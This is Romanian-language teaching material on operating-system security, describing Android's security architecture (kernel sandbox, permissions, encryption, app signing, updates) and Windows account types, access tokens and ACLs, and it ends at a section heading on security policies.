Android a fost proiectat ținînd cont de dezvoltatori. Controale de securitate au fost concepute
pentru a reduce povara asupra dezvoltatorilor. Dezvoltatorii pot lucra cu ușurință și se pot baza pe
controalele de securitate flexibile. Dezvoltatorii mai puțin familiarizați cu securitatea vor fi protejați de
valori implicite sigure.
Android a fost proiectat ținînd cont de utilizatorii de dispozitive. Utilizatorilor li se furnizează
vizibilitate asupra modului în care funcționează aplicațiile, precum și controlul asupra acestor aplicații.
Acest design include speranța că atacatorii vor încerca să efectueze atacuri comune, cum ar fi atacurile
de inginerie socială pentru a convinge utilizatorii să instaleze dispozitive malware, precum și atacurile
asupra aplicații terțe pe Android. Android a fost proiectat pentru a reduce atît probabilitatea acestor
atacuri cît și pentru a limita foarte mult impactul atacului, în cazul în care acesta a fost reușit.

2.1 Programe de securitate Android


Încă de la începutul dezvoltării, echipa de dezvoltare a Android a recunoscut că un model de
securitate robust e necesar pentru a permite un ecosistem viguros de aplicații și dispozitive construite
pe și în jurul platformei Android și susținute de servicii de cloud. Ca urmare, prin intermediul
întregului ciclului de dezvoltare, Android a fost supus unui program de securitate profesional. Echipa
Android a avut ocazia de a observa modul în care celelalte mobile, desktop, și platforme server
împiedică și reacționează la problemele de securitate și de a construi un program de securitate pentru a
aborda punctele slabe observate în alte oferte.
Componentele cheie ale Programului de Securitate Android includ:
Design Review: procesul de securitate Android începe devreme în ciclul de dezvoltare, cu
crearea unui model de securitate bogat și configurabil. Fiecare caracteristică majoră a platformei
revizuie resusele de inginerie și securitate, cu controale de securitate corespunzătoare integrate în
arhitectura sistemului.
Testarea și prezentarea codului: în timpul dezvoltării platformei, Android și componentele
open-source create sunt supuse unor evaluări de securitate viguroase. Aceste evaluări sunt efectuate de
către echipa de securitate Android, echipa Google Information Security Engineering, și consultanți
independenți de securitate. Scopul acestor evaluări este de a identifica punctele slabe și punctele
vulnerabile posibile precum și pentru a simula tipuri de analiză, care vor fi efectuate de către experți
externi.
Open Source și opinia comunității: Proiectul Android Open Source permite să fie efectuată
evaluarea securității de către orice parte interesată. Android folosește, de asemenea, tehnologiile open-
source, care au fost supuse evaluărilor externe semnificative, cum ar fi kernel-ul Linux. Google Play
oferă un forum pentru utilizatorii și întreprinderile unde furnizează informații cu privire la aplicații
specifice direct la utilizatori.
Reacția la incidente: Chiar și cu toate aceste măsuri de precauție, problemele de securitate pot
apărea dupa transportare, motivul pentru care proiectul Android a creat un proces de securitate
cuprinzător ca răspuns. O echipa de securitate Android monitorizează în mod constant comunitatea de
securitate specifică Android și generală pentru discutarea potențialelor vulnerabilități. La descoperirea
problemelor legitime, echipa Android are un proces de răspuns care permite atenuarea rapidă a
vulnerabilităților pentru a se asigura că riscul potențial pentru toți utilizatorii Android este minimizat.
Aceste răspunsuri pot include actualizarea platformei Android (actualizări over-the-air), eliminarea
aplicațiilor de la Google Play, precum și eliminarea aplicațiilor de la dispozitive din domeniu.

2.2 Arhitectura de securitate a platformei Android


Android urmărește să fie cel mai sigur și ușor de utilizat sistem de operare pentru platforme
mobile prin modificarea scopului controalelor de securitate a sistemelor de operare pentru a:
 Proteja datele utilizatorului
 Proteja resurselor de sistem (inclusiv de rețea)
 Oferi izolarea aplicației.
Pentru a atinge aceste obiective, Android oferă aceste caracteristici cheie de securitate:
 Securitate robustă la nivelul sistemului de operare prin intermediul kernel-ului Linux
 Sandbox-ul aplicației obligatoriu pentru toate aplicațiile
 Comunicare între procese securizată
 Semnătura aplicației
 Permisiuni definite pe aplicație și permise de utilizator.
În figura 2.2 sunt sumarizate componentele de securitate și considerentele diferitor niveluri ale
stivei software-ul Android. Fiecare componentă presupune că componentele de mai jos sunt securizate
corespunzător. Cu excepția unei cantități mici de cod Android OS rulează ca root, tot codul de mai sus
de kernel-ul Linux este restricționat de Application Sandbox.

Figura 2.2. Stiva software Android


2.3 Nivelul de securitate a sistemului și Kernel-ului
La nivel de sistem de operare, platforma Android oferă securitatea kernel-ului Linux, precum și
facilitatea de comunicare între procese securizat (IPC) pentru a activa comunicarea securizată între
aplicațiile care rulează în diferite procese. Aceste caracteristici de securitate la nivel de sistem de
operare asigură că și codul nativ este constrîns de Sandbox Application. Dacă acest cod este rezultatul
comportamentului aplicației incluse sau o exploatare a unei vulnerabilități a aplicației, sistemul ar
împiedica aplicația să afecteze alte aplicații, sistemul Android, sau însuși dispozitivul.
2.3.1 Securitate Linux
Fundația platformei Android este kernel-ul Linux. Kernel-ul Linux în sine a fost în uz pe scară
largă de ani de zile, și este utilizat în milioane de medii sensibile de securitate. Prin istoria sa fiind
cercetat în mod constant, atacat, și fixat de mii de dezvoltatori, Linux a devenit un kernel stabil și sigur,
în care au încredere multe companii și profesioniști în securitate.
Ca bază pentru un mediu de calcul mobil, kernel-ul Linux oferă platformei Android cu mai
multe caracteristici cheie de securitate, inclusiv:
 Modelul de permisiuni bazat pe utilizator
 Proces de izolare
 Mecanism extensibil pentru IPC securizat
 Capacitatea de a elimina piese inutile și potențial nesigur ale kernel-ului
2.3.2 Application Sandbox
Platforma Android profită de protecția Linux bazată pe utilizator ca mijloc de identificare și
izolare a resurselor de aplicare. Sistemul Android atribuie un ID unic de utilizator (UID) pentru fiecare
aplicație Android și îl rulează ca acel utilizator într-un proces separat. Această abordare este diferită de
alte sisteme de operare (inclusiv configurația tradițională Linux), în cazul în care mai multe aplicații
rulează cu aceleași permisiuni de utilizator.
Aceasta stabilește un Application Sandbox la nivelul de kernel. Kernel-ul impune securitatea
între aplicații și sistem la nivel de proces prin facilități standarde Linux, cum ar fi ID-urile de utilizator
și de grup, care sunt atribuite aplicațiilor. În mod implicit, aplicațiile nu pot interacționa unele cu altele
și au acces limitat la sistemul de operare. Dacă aplicația A încearcă să facă ceva rău intenționat cum ar
fi să citească datele aplicației B sau să apeleze telefonul fără permisiune (care este o aplicație separată),
atunci sistemul de operare protejează împotriva acestei aplicații, deoarece aplicația A nu are privilegiile
corespunzătoare de utilizator.
Deoarece Application Sandbox este în kernel, acest model de securitate se extinde la cod nativ
și la aplicații ale sistemului de operare. Tot software-ul de mai sus de kernel în Figura 1, inclusiv
bibliotecile sistemului de operare, cadru de aplicare, cererea de rulare, precum și toate aplicațiile
rulează în cadrul Application Sandbox. Pe unele platforme, dezvoltatorii sunt constrînși la un cadru de
dezvoltare specific, set de API-uri, sau de limbă, cu scopul de a impune securitate. Pe Android, nu
există restricții privind modul în care o aplicație poate fi scrisă; în acest sens, codul nativ este la fel de
sigur ca și codul interpretat.
În unele sisteme de operare, erori de corupere a memoriei duc, în general, la compromiterea
completă a securității dispozitivului. Acesta nu este cazul în Android datorită tuturor aplicațiilor și
resurselor acestora. O eroare de corupere a memoriei va permite doar executarea codului arbitrar, în
cadrul aplicației specifice, cu permisiunile stabilite de sistemul de operare.
Ca toate caracteristicile de securitate, Application Sandbox nu este indestructibil. Cu toate
acestea, pentru a îl sparge într-un dispozitiv configurat corect, trebuie să fie compromisă securitatea
kernel-ului Linux.
2.3.3 Partiție de sistem și Safe Mode
Partiția de sistem conține kernel-ul Android, precum și bibliotecile sistemului de operare,
timpul de execuție a aplicației, cadrul de aplicare, și aplicațiile. Această partiție este setată la modul
read-only. Cînd un utilizator conectează dispozitivul în Safe Mode, doar aplicațiile Android de bază
sunt disponibile. Acest lucru asigură faptul că utilizatorul poate porni telefonul într-un mediu care este
liber de software-ul părților terțe.
2.3.4 Permisiuni FileSystem
Într-un mediu în stil UNIX, permisiunile sistemului de fișiere asigură că un utilizator nu poate
modifica sau citi fișierele altui utilizator. În cazul Android, fiecare aplicație rulează ca utilizator
proprie. Cu excepția cazului în care dezvoltatorul expune în mod explicit fișierele altor aplicații,
fișierele create de o aplicație nu pot fi citite sau modificate de către o altă aplicație.
2.3.5 Criptare FileSystem
Android 3.0 și versiunile mai tîrzii, asigură criptarea completă a sistemului de fișiere, astfel
toate datele utilizatorului pot fi criptate în kernel-ul folosind imlementarea dmcrypt a AES128 cu CBC
și ESSIV: SHA256. Cheia de criptare este protejată de AES128 folosind o cheie derivată din parola
utilizatorului, prevenind accesul neautorizat la datele stocate, fără parola dispozitivului utilizatorului.
Pentru a oferi rezistență față de atacurile de ghicire sistematică a parolei, parola este combinată la
întîmplare și trunchiată în mod repetat cu SHA1 folosind algoritmul standard PBKDF2 înainte de a fi
utilizat pentru a decripta cheia sistemului de fișiere. Pentru a oferi rezistență față de atacuri de ghicire a
parolei din dicționar, Android prevede reguli de complexitate a parolei, care pot fi stabilite de către
administratorul de dispozitiv și puse în aplicare de către sistemul de operare. Criptarea sistemului de
fișiere necesită utilizarea unei parole de utilizator, modelul bazat pe ecran de blocare nu este acceptată.
2.3.6 Protejarea parolei
Android poate fi configurat pentru a verifica o parolă de utilizator furnizată înainte de a oferi
acces la un dispozitiv. În plus, pentru a preveni utilizarea neautorizată a dispozitivului, această parolă
protejează cheia criptografică pentru criptarea completă a sistemului de fișiere.
Utilizarea unei parole și / sau a regulilor de complexitate a parolei poate fi cerută de către un
administrator al dispozitivului.
2.3.7 Administrarea dispozitivului
Android 2.2 și versiunile mai tîrzii furnizează Android Device Administration API, care oferă
caracteristici de administrare ale dispozitivului la nivel de sistem. De exemplu, aplicația integrată
Android Emai utilizează API-uri pentru a îmbunătăți suportul de schimb. Prin aplicația Email,
administratorii Exchange pot aplica politici de parole - inclusiv parole alfanumerice sau PIN-uri
numerice - pe tot dispozitivul. Administratorii pot, de asemenea, șterge de la distanță (restabili setările
implicite) dispozitivele pierdute sau furate.
2.3.8 Root pentru dispozitiv
În mod implicit, pe Android doar kernel-ul și un subset mic de aplicații de bază se execută cu
permisiuni de root. Android nu împiedică un utilizator sau o aplicație cu permisiuni de root de la
modificarea sistemului de operare, kernel-ului, precum și oricărei alte aplicație. În general, root are
acces deplin la toate aplicațiile și datele lor. Utilizatorii care schimbă permisiunile pe un dispozitiv
Android pentru a acorda acces root aplicațiilor, sporesc expunerea de securitate față de aplicații
malware și potențiale defecte ale aplicațiilor.
Capacitatea de a modifica un dispozitiv Android pe care le dețin, este important pentru
dezvoltatorii care lucrează cu platforma Android. Pe mai multe dispozitive Android utilizatorii au
posibilitatea de a debloca bootloader-ul pentru a permite instalarea unui sistem de operare alternativ.
Aceste sisteme de operare alternative pot permite unui proprietar să cîștige acces root pentru scopuri de
depanare a aplicațiilor și componentelor de sistem sau pentru a accesa funcții care nu sunt prezentate la
aplicații de către Android API.
La unele dispozitive, o persoană cu un control fizic al unui dispozitiv și un cablu USB este
capabil de a instala un sistem de operare nou, care oferă privilegii de root pentru utilizator. Pentru a
proteja toate datele utilizatorilor existente de la compromitere, mecanismul de deblocare bootloader
necesită ca bootloader-ul să șteargă orice date ale utilizatorilor existente ca parte a etapei de deblocare.
Accesul root cîștigat prin exploatarea unei erori de kernel sau unei breșe de securitate poate ocoli
această protecție.
Criptarea datelor cu o cheie stocată pe dispozitiv nu protejează datele aplicației de utilizatorii cu
acces root. Aplicațiile pot adăuga un nivel de protecție a datelor folosind criptarea cu o cheie stocată pe
dispozitiv, cum ar fi pe un server sau o parolă de utilizator. Această abordare poate oferi o protecție
temporară în timp ce cheia nu este prezentă, dar la un moment dat cheia trebuie să fie furnizată
aplicației și apoi devine accesibilă pentru utilizatorii cu acces root.
În cazul pierderii sau furtului dispozitivului, criptarea completă a sistemului de fișiere pe
dispozitivele Android utilizează parola dispozitivului pentru a proteja cheia de criptare, astfel
modificînd bootloader-ul sau sistemul de operare nu este suficientă pentru a accesa datele utilizatorului
fără parola dispozitivului utilizatorului.

2.4 Securitatea aplicațiilor Android


În mod implicit, o aplicație Android poate accesa doar o gamă limitată de resurse de sistem.
Sistemul gestionează accesul la resursele aplicațiilor Android care, dacă sunt folosite incorect sau cu
rea intenție, ar putea avea un impact negativ asupra experienței utilizatorului, rețelei, sau a datelor de
pe dispozitiv.
Aceste restricții sunt puse în aplicare într-o varietate de forme diferite. Unele capacități sunt
restricționate de o lipsă intenționată de API-uri pentru funcționalitate (de exemplu, nu există nici un
API pentru manipularea directă a cartelei SIM). În unele cazuri, separarea rolurilor oferă o măsură de
securitate. În alte cazuri, API-urile sunt destinate utilizării de către aplicații de încredere și protejate
printr-un mecanism de securitate cunoscut sub numele de Permissions.
Aceste API-uri protejate includ:
 Funcțiile camerei
 Datele de localizare (GPS)
 Funcțiile bluetooth
 Funcțiile telefoniei
 Funcții SMS / MMS
 Conexiuni la rețea / date
Aceste resurse sunt accesibile numai prin intermediul sistemului de operare. Pentru a face uz de
API-uri protejate de pe dispozitiv, o aplicație trebuie să definească capacitățile de care are nevoie.
Cînd se pregătește să instaleze o aplicație, sistemul afișează o casetă de dialog utilizatorului, care
indică permisiunile solicitate și întreabă dacă să continue instalarea. Dacă utilizatorul continuă
instalarea, sistemul acceptă faptul că utilizatorul a acordat toate permisiunile solicitate. Utilizatorul nu
poate acorda sau refuza permisiuni individuale - utilizatorul trebuie să acorde sau să refuze toate
permisiunile solicitate în formă de bloc.
Odată acordate, permisiunile se aplică aplicației atît timp cît este instalată. Pentru a evita
confuzia utilizatorului, sistemul nu notifică utilizatorul din nou de permisiunile acordate aplicației, și
aplicațiile care sunt incluse în sistemul de operare de bază nu solicită permisiuni de la utilizator.
Permisiunile sunt eliminate în cazul în care o aplicație este dezinstalată, deci o ulterioară re-instalare
va afișa din nou permisiunile.
În cadrul setărilor dispozitivului, utilizatorii au posibilitatea de a vedea permisiunile pentru
aplicațiile pe care le-au instalate anterior. Utilizatorii pot dezactiva anumite funcționalități la nivel
global atunci cînd aleg, cum ar fi dezactivarea GPS, radio, sau Wi-Fi.
În cazul în care o aplicație încearcă să utilizeze o caracteristică protejată, care nu a fost
declarată în manifestul aplicației, eșecul permisiunii tipic va rezulta într-o excepție de securitate fiind
aruncată înapoi la aplicație. Controalele de permisiuni API protejate sunt puse în aplicare la cel mai
mic nivel posibil pentru a preveni eludarea. Un exemplu de mesagerie a utilizatorului atunci cînd o
aplicație este instalată în timp ce solicită accesul la API-uri protejate este prezentat în Figura 2.4.1.

Permissions at Application Install -- Google Permissions of an Installed Application –


Maps gMail

Figura 2.4.1. Prezentarea permisiunilor pentru aplicații

2.4.1 Cum înțeleg utilizatorii aplicațiile părților terțe


Android încearcă să realizeze interacțiunea utilizatorilor cu aplicațiile părților terțe cît mai clară
și să informeze utilizatorul ce capacități au aceste aplicații. Înainte de instalarea oricărei aplicații,
utilizatorului îi este indicat un mesaj clar cu privire la diverse permisiuni pe care le solicită aplicația.
După instalare, utilizatorul nu mai este rugat să confirme orice permisiune.
Există multe motive pentru a prezenta permisiunile înainte de instalare. Este momentul cînd
utilizatorul revizuiește activ informații despre aplicație, dezvoltator, și funcționalitate pentru a stabili
dacă acestea corespund nevoilor și așteptărilor lui. De asemenea, este important că acesta încă nu a
stabilit un angajament mental sau financiar față de aplicație, și o poate compara cu ușurință cu alte
aplicații alternative.
Unele platforme folosesc o abordare diferită a notificării utilizatorului, solicitînd permisiunea la
începutul fiecărei sesiuni sau în timp ce aplicațiile rulează. Viziunea Android este că utilizatorii să aibă
libertatea de a schimba aplicațiile fără probleme atunci cînd doresc. Fiind nevoiți să confirme de fiecare
dată, ar încetini utilizatorul și nu va permite platformei Android să îi livreze o experiență excelentă.
Avînd permisiunile de revizuire la instalare, utilizatorul are opțiunea de a nu instala aplicația dacă se
simte inconfortabil.
De asemenea, multe studii a interfeței de utilizator au arătat că prezența a multor ferestre de
confirmare îl determină pe utilizator să înceapă să spună "OK" pentru fiecare dintre ele. Unul din
obiectivele de securitate ale Android este de a transmite în mod eficient informațiile de securitate
importante pentru utilizator, care nu poate fi realizat cu ajutorul ferestrelor de dialog pe care utilizatorul
va fi instruit să le ignore. Prin prezentarea informațiilor importante o dată, și numai atunci cînd este
important, utilizatorul este mult mai probabil să gîndească cu ce este de acord.
Unele platforme aleg să nu prezinte nici o informație despre funcționalitatea aplicațiilor.
Această abordare împiedică utilizatorii să înțeleagă ușor și să discute capacitățile aplicației. În timp ce
nu este posibil pentru toți utilizatorii să facă întotdeauna decizii bazate pe cunoștințe, modelul de
permisiuni Android face informația despre aplicații ușor accesibilă pentru o gamă largă de utilizatori.
De exemplu, cererile neprevăzute de permisiuni pot solicita utilizatorilor mai sofisticați să pună
întrebări critice despre funcționalitatea aplicației și să împărtășească preocupările lor în locuri cum ar fi
Google Play unde sunt vizibili pentru toți utilizatorii.
2.4.2 Acces la cartela SIM
Accesul de nivel scăzut la cartela SIM nu este disponibilă pentru aplicații terțe. Sistemul de
operare gestionează toate comunicările cu cartela SIM, inclusiv accesul la informații personale
(contacte) pe memoria cartelei SIM. Aplicațiile, de asemenea, nu pot accesa comenzi AT, astfel cum
acestea sunt gestionate exclusiv de Radio Interface Layer (RIL). RIL nu furnizează API-uri de nivel
înalt pentru aceste comenzi.
2.4.3 Informații personale
Android a pus API-uri care permit accesul la datele utilizatorilor în setul de API-uri protejate.
Cu o utilizare normală, dispozitivele Android vor acumula, de asemenea, datele de utilizator în cadrul
aplicațiilor terțe instalate de către utilizatori. Aplicațiile care aleg să împărtășească această informație
pot folosi controalele de permisiune a sistemului de operare Android pentru a proteja datele de aplicații
terțe.

Figura 2.4.3.1. Accesul la datele utilizatorului este posibil doar prin intermediul API-urilor protejate

Furnizorii de conținut ai sistemului, care pot conține informații personale sau de identificare
personală, cum ar fi contactele și calendarul, au fost creați cu permisiuni clar identificate. Această
granularitate oferă utilizatorului indicații clare a tipurilor de informații care pot fi furnizate aplicației. În
timpul instalării, o aplicație terță poate cere permisiunea de a accesa aceste resurse. Dacă permisiunea
este acordată, aplicația poate fi instalată și va avea acces la datele solicitate în orice moment.
Orice aplicație care colectează informații cu caracter personal în mod implicit vor avea aceste
date limitate numai pentru aplicații specifice. În cazul în care o aplicație alege să facă datele disponibile
pentru alte aplicații prin IPC, aplicația care acordă acces poate aplica permisiuni pentru mecanismul
IPC, care este pus în aplicare de către sistemul de operare.
2.4.4 Dispozitive de introducere a datelor sensibile
Dispozitivele Android oferă frecvent dispozitive de introducere a datelor sensibile, care permit
aplicațiilor să interacționeze cu mediul înconjurător, cum ar fi camera foto, microfon sau GPS. Pentru o
aplicație terță ca să acceseze aceste dispozitive, trebuie mai întâi furnizate în mod explicit accesul de
către utilizator prin utilizarea de Android OS Permissions.
Dacă o aplicație dorește să știe locația utilizatorului, aplicația necesită o permisiunea de a
accesa locația utilizatorului. După instalare, programul de instalare va întreba utilizatorul dacă aplicația
poate accesa locația utilizatorului. În orice moment, în cazul în care utilizatorul nu dorește nici o
aplicație să acceseze locația, poate rula aplicația "Settings", să meargă la "Location & Security", și să
debifeze "Use wireless networks" și "Enable GPS satellites". Acest lucru va dezactiva serviciile bazate
pe localizare pentru toate aplicațiile de pe dispozitivul utilizatorului.
2.4.5 Metadata dispozitivului
Android, de asemenea, încearcă să limiteze accesul la date care nu sunt intrinsec sensibile, dar
pot dezvălui indirect caracteristicile legate de utilizator, preferințele utilizatorului, precum și modul în
care acesta folosește un dispozitiv.
Aplicațiile implicite nu au acces la log-urile sistemului de operare, istoricul browser-ului, număr
de telefon, sau informația de identificare hardware / rețea. Dacă o aplicație cere acces la această
informație în momentul instalării, programul de instalare va întreba utilizatorul dacă aplicația poate
accesa informațiile. În cazul în care utilizatorul nu permite accesul, aplicația nu va fi instalată.
2.4.6 Semnătura aplicațiilor
Semnarea codului permite dezvoltatorilor să identifice autorul aplicației și să actualizeze
aplicarea acesteia, fără a crea interfețe complicate și permisiuni. Fiecare aplicație care rulează pe
platforma Android trebuie să fie semnată de către dezvoltator. Aplicațiile care încearcă să instaleze,
fără a fi semnate sunt respinse fie de către Google Play fie de programul de instalare pe dispozitivul
Android.
Pe Google Play, semnarea aplicației identifică încrederea pe care Google o are față de
dezvoltator și încrederea dezvoltatorului în aplicația lui. Dezvoltatorii știu că aplicația lor este livrată
nemodificată la dispozitivul Android, și dezvoltatorii pot fi trași la răspundere pentru comportamentul
aplicației lor.
Pe Android, semnarea aplicației este primul pas pentru introducerea unei aplicații în
Application Sandbox. Certificatul aplicației semnate definește care ID de utilizator este asociat cu care
aplicație; diferite aplicații rulează sub ID-uri de utilizator diferite. Semnarea aplicației garantează că o
aplicație nu poate accesa orice altă aplicație decît prin IPC bine definit.
Atunci cînd o aplicație (fișier APK) este instalat pe un dispozitiv Android, Package Manager
verifică dacă APK a fost corect semnat cu certificatul inclus. În cazul în care certificatul (sau, mai
exact, cheia publică în certificat) se potrivește cu cheia utilizată pentru a semna orice alt APK pe
dispozitiv, noul APK are opțiunea de a specifica în manifest că va împărți un UID cu alte APK semnate
similar.
Aplicațiile pot fi semnate de către o parte terță (OEM, operator, piața alternativă) sau auto-
semnate. Android prevede semnarea codului folosind certificate auto-semnate, pe care dezvoltatorii le
pot genera fără asistența externă sau permisiune. Aplicațiile nu trebuie să fie semnate de către o
autoritate centrală. Android în prezent, nu efectuează verificarea certificatelor CA pentru aplicații.
Aplicațiile sunt, de asemenea, capabile să declare permisiunile de securitate la nivelul protecției
semnăturii, limitînd accesul numai la aplicații semnate cu aceeași cheie menținînd în același timp UID-
uri distincte.
2.4.7 Management-ul drepturilor digitale
Platforma Android oferă un cadru extensibil DRM care permite aplicațiilor să gestioneze
conținutul protejat de drepturi în conformitate cu constrîngerile licenței care sunt asociate conținutului.
Cadrul DRM suportă multe scheme DRM.
Cadrul Android DRM este implementat în două nivele arhitecturale (Figura 2.4.7.1):
• Un API al cadrului DRM, care este expus la aplicații prin cadrul de aplicații Android și
rulează prin Dalvik VM pentru aplicații standarde.
• Un manager de cod nativ DRM, care implementează cadrul DRM și expune o interfață pentru
plug-inurile (agenți) DRM să gestioneze drepturile de management și decriptarea pentru diferite
scheme DRM.

Figure 2.4.7.1: Architectura Digital Rights Management pe platforma Android

2.5 Actualizări Android


Android oferă actualizări de sistem, atît pentru securitate cît și pentru scopuri legate de
caracteristici.
Există două moduri de a actualiza codul pe majoritatea dispozitivelor Android: over-the-air
(actualizări OTA) sau actualizări side-loaded. Actualizările OTA pot fi rulate pe o perioadă de timp
definită sau propuse la toate dispozitivele dintr-o dată, în funcție de modul în care OEM și / sau
transportatorul ar dori să propună actualizările. Actualizările side-loaded pot fi furnizate de o locație
centrală pentru utilizatori să descarce un fișier zip pe desktop-ul lor sau direct pe telefonul lor. Odată ce
actualizarea este copiată sau descărcată pe cardul SD de pe dispozitiv, Android va recunoaște
actualizarea, va verifica integritatea și autenticitatea, și va actualiza automat dispozitivul.
În cazul în care o vulnerabilitate periculoasă este descoperită în interior sau raportată în mod
responsabil la Google sau Android Open Source Project, echipa de securitate Android va începe
următorul proces.
1. Echipa Android va notifica companiile care au semnat NDA cu privire la problemă și va
începe discutarea soluției.
2. Proprietarii de cod vor începe să-l fixeze.
3. Echipa Android va stabili problemele de securitate legate de Android.
4. Atunci cînd un patch este disponibil, fixarea este oferită de companiile NDA.
5. Echipa Android va publica patch-uri în cadrul Proiectului Open Source Android
6. OEM / transportatorul va propune o actualizare clienților.
NDA trebuie să asigure că problema securității nu devine publică înainte de disponibilitatea
unei soluții.
Tema: Securitatea sistemelor de operare Windows

Sistemele de operare asigurară securitatea și integritatea sistemului de calcul. Permite


interacțiunea cu mai mulți utilizatori, rularea mai multor aplicații și modificarea strategiilor de
răspuns la o anumită problemă.
Sistemul de operare controlează accesul utilizatorilor și proceselor la resursele hadware și
software ale sistemului și previne execuția de instrucțiuni invalide, malițioase sau privilegiate.

1.1. Centrul de securitate Windows Defender, figura ,1 oferă zona Protecție împotriva
virușilor și amenințărilor, pentru a proteja sistemul de calcul. Sunt disponibile următoarele soluții
de securitate:
- Protecția împotriva virușilor și amenințărilor, prin scanarea după amenințări și
actualizarea la cea mai recentă protecție oferită de Antivirus Windows Defender,
vizualizarea scanărilor anterioare împotriva virușilor și amenințărilor.
- Urmărirea stării de bună funcționare a sistemului și performanță. Consultantul
monitorizează sistemul de calcul și oferă informații, recomandări într-un raport privind
starea de bună funcționare pentru a adresa problemele uzuale cu capacitatea de stocare,
driverele de dispozitiv, autonomia bateriei, Windows Update sau Fresh Start.
- Firewall și protecție în rețea. Se poate vedea starea Firewallului Windows și rețelele la
care este conectat sistemul de calcul. Pot fi accesate și setate opțiunile de filtrare a datelor
transmise prin rețea în/din sistem.
- Controlul aplicațiilor și browserului. SmartScreen contribuie la protejarea dispozitivului
dvs. împotriva aplicațiilor, fișierelor, site-urilor web și descărcărilor potențial periculoase.
- Protejarea familiei dvs. în mediul online. Opțiunile pentru familie oferă acces ușor la
instrumente utile pentru gestionarea vieții digitale a copiilor sau altor membri ai familiei în
sistemul de calcul.
Figura 1. Windows Defender Security Center
1.2. Conturi de utilizator

Conturile de utilizator permit mai multor utilizatori să folosească același sistem de calcul,
fiecare având propriul folder privat de Documente, poștă electronică, setări, etc. De asemenea, este
îmbunătățită securitatea și sunt reduse probleme ce pot apărea la partajarea de fișiere.
Un nou cont de utilizator ar trebui creat atunci când există o altă persoană care lucrează pe
același calculator cu tine.
În Windows 10 există două tipuri principale de conturi: administrator și standard (utilizator
standard).
Administratorul are acces complet la toate conturile de utilizator de pe calculator. Poate
crea și șterge conturi de utilizator, poate crea parole pentru ceilalți utilizatori, le poate schimba
numele contului, parola, imaginea sau tipul de cont. Ca regulă, trebuie să existe cel puțin un cont
de administrator pe calculator. Implicit, la instalarea sistemului de operare, se creează un cont de
administrator.
Utilizatorul standard este configurat de către un administrator. Un utilizator standard poate
instala aplicații și poate schimba configurări pentru uzul propriu. Utilizatorii standard nu pot
adăuga alți utilizatori și nu pot modifica configurările altor utilizatori.
Își poate modifica imaginea contului și poate crea, modifica sau șterge parola, dar nu poate
schimba numele sau tipul contului său. De asemenea, unele programe (mai ales programe vechi)
este posibil să nu funcționeze corect pe acest tip de cont. Este posibil ca ele să solicite modificarea
temporară sau permanentă a contului utilizator într-unul de administrator.
În plus față de alegerea unuia dintre aceste tipuri de conturi, se poate alege, de asemenea,
o metodă de conectare pentru fiecare tip: persoanele se pot conecta la Windows cu un cont
Microsoft sau cu un cont local (figura 2-4).
Figura 2. Crearea unui cont în Windows 10

Figura 3. Setările unui cont în Windows 10

Figura 4. Schimbarea tipului unui cont în Windows 10

RISCURI ȘI RECOMANDĂRI
Accesarea servicilor Web de pe un cont de administrator crează premise de infectare cu
programe malițioase, de aceea se recomandă să se utilizeze contul standard. Contul de
administrator se utilizează doar în cazul speciale.
Orice activitate din sistem trebuie să poată fi identificată prin contul de utilizator sau adresa
IP (să nu fie utilizate instrumente de anonimat în sistemele informatice, cum ar fi de exemplu
proxy server-e, anonymizer-r etc.).

Alte tipuri de conturi:


Utilizator administrat. Utilizatorii care sunt administrați cu controale parentale pot accesa
doar aplicațiile și conținutul specificat de administratorul care se ocupă de utilizator.
Administratorul poate restricționa contactele utilizatorului și accesul la site-uri web și poate aplica
limite temporale pentru utilizarea computerului.
Utilizator doar cu drepturi de partajare. Pot accesa de la distanță fișiere partajate, însă nu
pot face login și nu pot schimba configurările computerului.
Un grup permite mai multor utilizatori să aibă aceleași privilegii de acces. De exemplu, se
poate acorda unui grup anumite privilegii de acces la un dosar sau fișier și toți membrii grupului vor
avea acces. Se poate aloca privilegii de acces specifice unui grup pentru fiecare din dosarele partajate.
Utilizator vizitator. Poate utiliza temporar computerul dvs., fără a trebui să îi adăugați ca
utilizatori individuali. Se poate configura restricții astfel încât vizitatorii să poată accesa doar articolele
pe care doriți să le partajați. Fișierele create de un vizitator sunt stocate într-un dosar temporar, dar
acest dosar și conținutul său sunt șterse când vizitatorul face logout. Vizitatorii nu au nevoie de o parolă
pentru a face login, nu pot schimba configurările pentru utilizator sau computer.

1.3. Gestionarea drepturilor de acces

Utilizatorii (atât de domeniu, cît și locali), grupuri de utilizatori și calculatoare (numite


entități) au identificatoare de securitate unice - SID. Cu ajutorul acestui identificator sistemul
"știe" entitatea. SID are o valoare unică în domeniu și se formează în timpul creării unui utilizator
sau grup, sau atunci când calculatorul este înregistrat în domeniu.
Atunci când un utilizator la conectare introduce numele de utilizator și parola , sistemul de
operare verifică dacă parola este corectă și creează un token de acces pentru utilizator. Token-ul
include SID și toate SID-urile grupurilor utilizatorului din care utilizatorul face parte.
Pentru obiectele care urmează să fie protejate (cum ar fi fișiere, foldere, registru Windows)
se creează un descriptor de securitate. Cu el se asociază ACL (Access Control List - ACL), care
conține informații despre modul în care subiecților le sunt date anumite drepturi de acces la obiect.
Pentru a determina dacă să se acorde tipul solicitat de acces la obiect, sistemul de operare compară
SID în token-ul de acces al subiectului cu SID cuprins în ACL (figura 5).

Figura 5. Utilizatorii locali și grupurile de utilizatori

Permisiunile sunt sumate, iar interdicția este o prioritate mai mare decât permisiunea. De
exemplu, în cazul în care utilizatorul are permisiunea de a citi dosarul, și în grupul din care face parte
- de a scrie, ca urmare utilizatorul poate citi și scrie. În cazul în care utilizatorul are permisiunea de a
citi, și grupul din care face parte, citirea este interzisă, utilizatorul nu poate citi fișierul.
Dacă vorbim despre fișiere și foldere, mecanismele de securitate din sistemele de fișiere
sunt acceptate numai pe discuri cu sistem de fișiere NTFS. Sistemul de fișiere FAT (și varianta sa
- FAT32) nu implică posibilitatea de a stoca ACL, asociat cu fișierul (figura 6,7).

Figura 6. Drepturile de acces la fișiere și foldere

Figura 7. Permisiuni speciale pentru fișiere și foldere


RISCURI ȘI RECOMANDĂRI

Fiecărui utilizator trebuie să-i fie comunicat, într-o formă stabilită de responsabilul de
securitate cibernetică sau de către persoana responsabilă de proces (administratorul), drepturile,
obligațiile, restricțiile și responsabilitățile privind utilizarea mijloacelor TIC în activitatea de serviciu;
Să-i fie asociat un cont de utilizator specific atribuțiilor de serviciu, cu funcții de
administrare sau cu funcții de utilizator. Să fie utilizate în sistem mijloacele tehnice speciale, care
să interzică utilizarea acestor conturi de către persoane terțe.

1.4. Politicile de securitate

